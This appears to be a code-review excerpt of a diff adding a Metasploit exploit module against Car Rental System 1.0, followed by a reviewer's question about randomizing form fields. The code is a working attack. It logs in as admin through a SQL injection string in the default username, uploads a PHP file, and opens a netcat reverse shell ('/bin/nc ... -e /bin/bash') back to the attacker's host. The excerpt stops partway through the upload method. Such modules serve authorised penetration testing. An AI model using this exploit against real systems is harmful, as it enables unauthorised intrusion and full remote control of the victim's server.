modules/exploits/multi/php/car_rental_system.rb

```diff
@@ -0,0 +1,163 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Car Rental System 1.0 reverse shell',
+        'Description' => %q{
+          Car Rental System CMS 1.0, this module exploits a vulnerabilit, which allows to enter Admin page with SQL injection, and upload a PHP file and run a reverse shell.
+        },
+        'Author' =>
+          [
+            'Jyotsna Adhana and Saurav Shukla', # Discovery
+            'Fortunato Lodari - foxlox - fortunato dot lodari at dedagroup dot it' # metasploit module
+          ],
+        'References' =>
+          [
+            [ 'EDB', '48931' ],
+            [ 'URL', 'https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html' ],
+            [ 'URL', 'https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code' ]
+          ],
+        'Privileged' => true,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Platform' => ['php'],
+        'Arch' => [ARCH_PHP],
+        'Targets' =>
+          [
+            ['Automatic', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PrependMigrate' => true,
+          'WfsDelay' => 10
+        },
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2020-10-22'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The URI of the  Car Rental System', '/']),
+        OptString.new('USERNAME', [true, 'The Username for Car Rental', "' or 1=1 limit 1#"]),
+        OptString.new('PASSWORD', [true, 'The Password for Car Rental', 'moana']),
+        OptString.new('PAYLOAD', [true, 'Payload', 'php/reverse_php'])
+      ]
+    )
+
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
+  end
+
+  def inject_request(cookie)
+    host = datastore['LHOST']
+    port = datastore['LPORT']
+    fname = "#{Rex::Text::alpha(22)}.php"
+    php = "<?php \n"
+    php << "echo system('/bin/nc #{host} #{port} -e /bin/bash');\n"
+    php << "?>\n"
+    data = Rex::MIME::Message.new
+    data.add_part('0', nil, nil, 'form-data; name="price"')
+    data.add_part(Rex::Text::alpha(12), nil, nil, 'form-data; name="model"')
+    data.add_part(Rex::Text::rand_text_numeric(1), nil, nil, 'form-data; name="transmission_id"')
+    data.add_part(Rex::Text::alpha(12), nil, nil, 'form-data; name="description"')
+    data.add_part('1', nil, nil, 'form-data; name="engine_id"')
+    data.add_part('A', nil, nil, 'form-data; name="brand"')
+    data.add_part('3', nil, nil, 'form-data; name="category_id"')
+    data.add_part('', nil, nil, 'form-data; name="id"')
+    data.add_part('0', nil, nil, 'form-data; name="qty"')
```

Comment:
Can these fields be randomized as well or do the IDs have to be these particular values?